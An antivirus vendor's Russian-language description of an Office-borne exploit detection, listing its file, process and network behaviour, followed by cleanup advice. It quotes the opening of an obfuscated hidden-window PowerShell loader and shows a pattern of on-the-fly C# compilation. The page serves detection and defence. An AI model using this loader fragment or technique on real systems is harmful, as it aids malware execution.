Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Exploit.Siggen.30522

Добавлен в вирусную базу Dr.Web: 2019-10-21

Описание добавлено:

Техническая информация

Вредоносные функции
Запускает на исполнение (эксплоит)
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function q2f8e {param($t642ded)$sa983c6='kf22e';$d5fd8='';for ($i=0; $i -lt $t642ded.length;$i+=2){$r999a4f=[convert]::ToByte($t642ded.Substring($i,2),16);$d5fd8+=[char]($...
Изменения в файловой системе
Создает следующие файлы
  • %TEMP%\ioysbxmz.0.cs
  • %TEMP%\res98f2.tmp
  • %TEMP%\csc98e2.tmp
  • %TEMP%\gwedonbz.out
  • %TEMP%\gwedonbz.cmdline
  • %TEMP%\gwedonbz.0.cs
  • %TEMP%\s8q_dhoc.dll
  • %TEMP%\res7f30.tmp
  • %TEMP%\csc7f20.tmp
  • %TEMP%\s8q_dhoc.out
  • %TEMP%\s8q_dhoc.cmdline
  • %TEMP%\s8q_dhoc.0.cs
  • %TEMP%\ajvjtnde.dll
  • %TEMP%\1i8rjzyl.0.cs
  • %TEMP%\gwedonbz.dll
  • %TEMP%\ajvjtnde.out
  • %TEMP%\ajvjtnde.cmdline
  • %TEMP%\ajvjtnde.0.cs
  • %TEMP%\0qiyx6nq.dll
  • %TEMP%\res3b32.tmp
  • %TEMP%\csc3b22.tmp
  • %TEMP%\0qiyx6nq.out
  • %TEMP%\0qiyx6nq.cmdline
  • %TEMP%\0qiyx6nq.0.cs
  • %TEMP%\5rwtxshz.dll
  • %TEMP%\res2818.tmp
  • %TEMP%\csc2807.tmp
  • %TEMP%\res6a41.tmp
  • %TEMP%\resabb4.tmp
  • %TEMP%\1i8rjzyl.cmdline
  • %TEMP%\res393.tmp
  • %TEMP%\csc382.tmp
  • %TEMP%\yddfx-a1.out
  • %TEMP%\yddfx-a1.cmdline
  • %TEMP%\yddfx-a1.0.cs
  • %TEMP%\.ds_store
  • %TEMP%\pj5-o_pl.dll
  • %TEMP%\resedc9.tmp
  • %TEMP%\cscedc8.tmp
  • %TEMP%\pj5-o_pl.out
  • %TEMP%\pj5-o_pl.cmdline
  • %TEMP%\pj5-o_pl.0.cs
  • %TEMP%\0fu3h-lg.dll
  • %TEMP%\resdb1c.tmp
  • %TEMP%\cscdb1b.tmp
  • %TEMP%\0fu3h-lg.out
  • %TEMP%\0fu3h-lg.cmdline
  • %TEMP%\0fu3h-lg.0.cs
  • %TEMP%\yo37shgo.dll
  • %TEMP%\rescbe9.tmp
  • %TEMP%\csccbe8.tmp
  • %TEMP%\yo37shgo.out
  • %TEMP%\yo37shgo.cmdline
  • %TEMP%\yo37shgo.0.cs
  • %TEMP%\1i8rjzyl.dll
  • %TEMP%\resb285.tmp
  • %TEMP%\cscb274.tmp
  • %TEMP%\5rwtxshz.out
  • %TEMP%\csc6a30.tmp
  • %TEMP%\5rwtxshz.cmdline
  • %TEMP%\5rwtxshz.0.cs
  • %TEMP%\5edzc85v.dll
  • %TEMP%\17g_kr0d.cmdline
  • %TEMP%\cscadf5.tmp
  • %TEMP%\cscad49.tmp
  • %TEMP%\cscacad.tmp
  • %TEMP%\cscabe2.tmp
  • %TEMP%\cscabb3.tmp
  • %TEMP%\cscab55.tmp
  • %TEMP%\17g_kr0d.out
  • %TEMP%\chpuu1n3.out
  • %TEMP%\cwprdj74.out
  • %TEMP%\byj-lurb.out
  • %TEMP%\byj-lurb.cmdline
  • %TEMP%\byj-lurb.0.cs
  • %TEMP%\17g_kr0d.0.cs
  • %TEMP%\resab56.tmp
  • %TEMP%\cwprdj74.cmdline
  • %TEMP%\cwprdj74.0.cs
  • %TEMP%\chpuu1n3.cmdline
  • %TEMP%\chpuu1n3.0.cs
  • %TEMP%\dbxqgxoe.out
  • %TEMP%\dbxqgxoe.cmdline
  • %TEMP%\dbxqgxoe.0.cs
  • %TEMP%\mbblzlme.out
  • %TEMP%\mbblzlme.cmdline
  • %TEMP%\mbblzlme.0.cs
  • %TEMP%\ioysbxmz.out
  • %TEMP%\ioysbxmz.cmdline
  • %TEMP%\yddfx-a1.dll
  • %TEMP%\1i8rjzyl.out
  • %TEMP%\dbxqgxoe.dll
  • %TEMP%\resacbd.tmp
  • %TEMP%\cscaeb0.tmp
  • %TEMP%\resffc.tmp
  • %TEMP%\cscfeb.tmp
  • %TEMP%\5edzc85v.out
  • %TEMP%\5edzc85v.cmdline
  • %TEMP%\5edzc85v.0.cs
  • %TEMP%\ytdj9j0s.dll
  • %TEMP%\resfa8f.tmp
  • %TEMP%\cscfa7f.tmp
  • %TEMP%\ytdj9j0s.out
  • %TEMP%\ytdj9j0s.cmdline
  • %TEMP%\ytdj9j0s.0.cs
  • %TEMP%\s7rizbgh.dll
  • %TEMP%\resc798.tmp
  • %TEMP%\cscc788.tmp
  • %TEMP%\s7rizbgh.out
  • %TEMP%\s7rizbgh.cmdline
  • %TEMP%\s7rizbgh.0.cs
  • %TEMP%\ioysbxmz.dll
  • %TEMP%\cwprdj74.dll
  • %TEMP%\byj-lurb.dll
  • %TEMP%\17g_kr0d.dll
  • %TEMP%\chpuu1n3.dll
  • %TEMP%\mbblzlme.dll
  • %TEMP%\resaec1.tmp
  • %TEMP%\resae06.tmp
  • %TEMP%\resad5a.tmp
  • %TEMP%\resac02.tmp
  • <LS_APPDATA>\microsoft\windows\<INETFILES>\content.word\~wrf{ead91639-d199-42ab-be86-129b4a585bc4}.tmp
Удаляет следующие файлы
  • %TEMP%\resab56.tmp
  • %TEMP%\s8q_dhoc.dll
  • %TEMP%\ajvjtnde.0.cs
  • %TEMP%\ajvjtnde.pdb
  • %TEMP%\res7f30.tmp
  • %TEMP%\csc7f20.tmp
  • %TEMP%\s8q_dhoc.0.cs
  • %TEMP%\s8q_dhoc.pdb
  • %TEMP%\s8q_dhoc.cmdline
  • %TEMP%\0qiyx6nq.out
  • %TEMP%\s8q_dhoc.out
  • %TEMP%\res98f2.tmp
  • %TEMP%\csc98e2.tmp
  • %TEMP%\gwedonbz.pdb
  • %TEMP%\gwedonbz.dll
  • %TEMP%\gwedonbz.out
  • %TEMP%\ajvjtnde.dll
  • %TEMP%\ajvjtnde.out
  • %TEMP%\res6a41.tmp
  • %TEMP%\0qiyx6nq.dll
  • %TEMP%\0qiyx6nq.0.cs
  • %TEMP%\0qiyx6nq.pdb
  • %TEMP%\0qiyx6nq.cmdline
  • %TEMP%\csc3b22.tmp
  • %TEMP%\csc2807.tmp
  • %TEMP%\gwedonbz.0.cs
  • %TEMP%\5rwtxshz.out
  • %TEMP%\5rwtxshz.cmdline
  • %TEMP%\5rwtxshz.pdb
  • %TEMP%\5rwtxshz.dll
  • %TEMP%\5rwtxshz.0.cs
  • %TEMP%\ajvjtnde.cmdline
  • %TEMP%\res3b32.tmp
  • %TEMP%\csc6a30.tmp
  • %TEMP%\gwedonbz.cmdline
  • %TEMP%\1i8rjzyl.dll
  • %TEMP%\0fu3h-lg.cmdline
  • %TEMP%\0fu3h-lg.0.cs
  • %TEMP%\resedc9.tmp
  • %TEMP%\cscedc8.tmp
  • %TEMP%\pj5-o_pl.out
  • %TEMP%\pj5-o_pl.pdb
  • %TEMP%\pj5-o_pl.0.cs
  • %TEMP%\0fu3h-lg.dll
  • %TEMP%\pj5-o_pl.cmdline
  • %TEMP%\res393.tmp
  • %TEMP%\csc382.tmp
  • %TEMP%\yddfx-a1.cmdline
  • %TEMP%\yddfx-a1.dll
  • %TEMP%\yddfx-a1.out
  • %TEMP%\0fu3h-lg.out
  • %TEMP%\0fu3h-lg.pdb
  • %TEMP%\byj-lurb.0.cs
  • %TEMP%\1i8rjzyl.0.cs
  • %TEMP%\1i8rjzyl.cmdline
  • %TEMP%\1i8rjzyl.pdb
  • %TEMP%\rescbe9.tmp
  • %TEMP%\resb285.tmp
  • %TEMP%\1i8rjzyl.out
  • %TEMP%\cscb274.tmp
  • %TEMP%\csccbe8.tmp
  • %TEMP%\yo37shgo.dll
  • %TEMP%\yo37shgo.out
  • %TEMP%\resdb1c.tmp
  • %TEMP%\cscdb1b.tmp
  • %TEMP%\yo37shgo.pdb
  • %TEMP%\yo37shgo.0.cs
  • %TEMP%\yo37shgo.cmdline
  • %TEMP%\res2818.tmp
  • %TEMP%\5edzc85v.0.cs
  • %TEMP%\5edzc85v.out
  • %TEMP%\cwprdj74.0.cs
  • %TEMP%\cwprdj74.dll
  • %TEMP%\cwprdj74.out
  • %TEMP%\cwprdj74.pdb
  • %TEMP%\cwprdj74.cmdline
  • %TEMP%\resaec1.tmp
  • %TEMP%\mbblzlme.cmdline
  • %TEMP%\chpuu1n3.0.cs
  • %TEMP%\mbblzlme.pdb
  • %TEMP%\mbblzlme.out
  • %TEMP%\mbblzlme.0.cs
  • %TEMP%\mbblzlme.dll
  • %TEMP%\chpuu1n3.pdb
  • %TEMP%\chpuu1n3.out
  • %TEMP%\cscadf5.tmp
  • %TEMP%\resae06.tmp
  • %TEMP%\cscab55.tmp
  • %TEMP%\cscabb3.tmp
  • %TEMP%\cscad49.tmp
  • %TEMP%\resad5a.tmp
  • %TEMP%\cscacad.tmp
  • %TEMP%\resacbd.tmp
  • %TEMP%\cscabe2.tmp
  • %TEMP%\cscaeb0.tmp
  • %TEMP%\resac02.tmp
  • %TEMP%\chpuu1n3.dll
  • %TEMP%\dbxqgxoe.cmdline
  • %TEMP%\dbxqgxoe.0.cs
  • %TEMP%\dbxqgxoe.pdb
  • %TEMP%\dbxqgxoe.out
  • %TEMP%\dbxqgxoe.dll
  • %TEMP%\resabb4.tmp
  • %TEMP%\chpuu1n3.cmdline
  • %TEMP%\17g_kr0d.pdb
  • %TEMP%\s7rizbgh.pdb
  • %TEMP%\resfa8f.tmp
  • %TEMP%\cscfa7f.tmp
  • %TEMP%\ytdj9j0s.pdb
  • %TEMP%\ytdj9j0s.dll
  • %TEMP%\s7rizbgh.dll
  • %TEMP%\17g_kr0d.cmdline
  • %TEMP%\s7rizbgh.out
  • %TEMP%\ytdj9j0s.cmdline
  • %TEMP%\cscfeb.tmp
  • %TEMP%\5edzc85v.cmdline
  • %TEMP%\5edzc85v.dll
  • %TEMP%\5edzc85v.pdb
  • %TEMP%\ytdj9j0s.0.cs
  • %TEMP%\ytdj9j0s.out
  • %TEMP%\resffc.tmp
  • %TEMP%\pj5-o_pl.dll
  • %TEMP%\yddfx-a1.pdb
  • %TEMP%\cscc788.tmp
  • %TEMP%\resc798.tmp
  • %TEMP%\ioysbxmz.dll
  • %TEMP%\ioysbxmz.cmdline
  • %TEMP%\ioysbxmz.out
  • %TEMP%\ioysbxmz.pdb
  • %TEMP%\ioysbxmz.0.cs
  • %TEMP%\s7rizbgh.0.cs
  • %TEMP%\byj-lurb.dll
  • %TEMP%\byj-lurb.pdb
  • %TEMP%\byj-lurb.out
  • %TEMP%\byj-lurb.cmdline
  • %TEMP%\17g_kr0d.0.cs
  • %TEMP%\17g_kr0d.out
  • %TEMP%\17g_kr0d.dll
  • %TEMP%\s7rizbgh.cmdline
  • %TEMP%\yddfx-a1.0.cs
Сетевая активность
UDP
  • DNS ASK am##opa.cc
Другое
Создает и запускает на исполнение
  • '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function q2f8e {param($t642ded)$sa983c6='kf22e';$d5fd8='';for ($i=0; $i -lt $t642ded.length;$i+=2){$r999a4f=[convert]::ToByte($t642ded.Substring($i,2),16);$d5fd8+=[char]($...' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES2818.tmp" "%TEMP%\CSC2807.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\0qiyx6nq.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES3B32.tmp" "%TEMP%\CSC3B22.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ajvjtnde.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES6A41.tmp" "%TEMP%\CSC6A30.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\s8q_dhoc.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7F30.tmp" "%TEMP%\CSC7F20.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\gwedonbz.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES98F2.tmp" "%TEMP%\CSC98E2.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\1i8rjzyl.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESB285.tmp" "%TEMP%\CSCB274.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\yo37shgo.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESCBE9.tmp" "%TEMP%\CSCCBE8.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\0fu3h-lg.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESDB1C.tmp" "%TEMP%\CSCDB1B.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\pj5-o_pl.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESEDC9.tmp" "%TEMP%\CSCEDC8.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\5rwtxshz.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\yddfx-a1.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESFFC.tmp" "%TEMP%\CSCFEB.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESFA8F.tmp" "%TEMP%\CSCFA7F.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ioysbxmz.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\mbblzlme.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\dbxqgxoe.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\cwprdj74.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\byj-lurb.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\chpuu1n3.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\17g_kr0d.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESAB56.tmp" "%TEMP%\CSCAB55.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESABB4.tmp" "%TEMP%\CSCABB3.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESAC02.tmp" "%TEMP%\CSCABE2.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESACBD.tmp" "%TEMP%\CSCACAD.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESAD5A.tmp" "%TEMP%\CSCAD49.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESAE06.tmp" "%TEMP%\CSCADF5.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESAEC1.tmp" "%TEMP%\CSCAEB0.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\s7rizbgh.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESC798.tmp" "%TEMP%\CSCC788.tmp"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ytdj9j0s.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\5edzc85v.cmdline"' (со скрытым окном)
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES393.tmp" "%TEMP%\CSC382.tmp"' (со скрытым окном)
Запускает на исполнение
  • '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES3B32.tmp" "%TEMP%\CSC3B22.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ajvjtnde.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES6A41.tmp" "%TEMP%\CSC6A30.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\s8q_dhoc.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES7F30.tmp" "%TEMP%\CSC7F20.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\gwedonbz.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES98F2.tmp" "%TEMP%\CSC98E2.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESAC02.tmp" "%TEMP%\CSCABE2.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\1i8rjzyl.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\yo37shgo.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESCBE9.tmp" "%TEMP%\CSCCBE8.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\0fu3h-lg.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESDB1C.tmp" "%TEMP%\CSCDB1B.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\pj5-o_pl.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESEDC9.tmp" "%TEMP%\CSCEDC8.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\yddfx-a1.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES2818.tmp" "%TEMP%\CSC2807.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\0qiyx6nq.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\5rwtxshz.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESFFC.tmp" "%TEMP%\CSCFEB.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\5edzc85v.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\mbblzlme.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\dbxqgxoe.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\cwprdj74.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\byj-lurb.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\chpuu1n3.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\17g_kr0d.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESAB56.tmp" "%TEMP%\CSCAB55.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES393.tmp" "%TEMP%\CSC382.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESB285.tmp" "%TEMP%\CSCB274.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESABB4.tmp" "%TEMP%\CSCABB3.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESAD5A.tmp" "%TEMP%\CSCAD49.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESAE06.tmp" "%TEMP%\CSCADF5.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESAEC1.tmp" "%TEMP%\CSCAEB0.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\s7rizbgh.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESC798.tmp" "%TEMP%\CSCC788.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ytdj9j0s.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESFA8F.tmp" "%TEMP%\CSCFA7F.tmp"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ioysbxmz.cmdline"
  • '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESACBD.tmp" "%TEMP%\CSCACAD.tmp"
  • '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке